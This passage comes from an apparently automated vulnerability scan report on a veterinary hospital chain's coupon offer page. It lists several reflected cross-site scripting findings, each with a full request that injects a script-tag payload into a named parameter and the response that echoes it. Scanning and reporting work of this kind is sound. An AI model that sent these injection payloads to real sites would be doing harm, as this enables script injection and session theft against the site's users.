GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:39 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=s9111l9njt4haqvhbc32et8al6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
hospitals.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=48342"><script>alert(1)</script>799b196a043&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26da
...[SNIP]...

2.36. http://www.vcahospitals.com/main/offer [petname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the petname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc9d9"><script>alert(1)</script>32ff1a8fde2 was submitted in the petname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:45 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=tltmjp59dlja7q81sha6gm0bu4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
.com/main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=fc9d9"><script>alert(1)</script>32ff1a8fde2&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307
...[SNIP]...

2.37. http://www.vcahospitals.com/main/offer [pettype parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the pettype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ff0"><script>alert(1)</script>c819c2cd266 was submitted in the pettype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=21dh1lcji1465f3ng24l2mb1q3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=48ff0"><script>alert(1)</script>c819c2cd266&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26
...[SNIP]...

2.38. http://www.vcahospitals.com/main/offer [phone parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the phone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141be"><script>alert(1)</script>908e5de26cc was submitted in the phone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=cuk6kin33gemm42a0q0adqee65; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=141be"><script>alert(1)</script>908e5de26cc&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3
...[SNIP]...

2.39. http://www.vcahospitals.com/main/offer [r parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the r request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd45"><script>alert(1)</script>a545781095a was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?r=E13fbd45"><script>alert(1)</script>a545781095a&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:03:51 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=vjr1h35soi9lhsqsn64d78ocd1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13fbd45"><script>alert(1)</script>a545781095a&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.40. http://www.vcahospitals.com/main/offer [referer parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the referer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df6e8"><script>alert(1)</script>093b3b8f1c4 was submitted in the referer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=df6e8"><script>alert(1)</script>093b3b8f1c4&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%25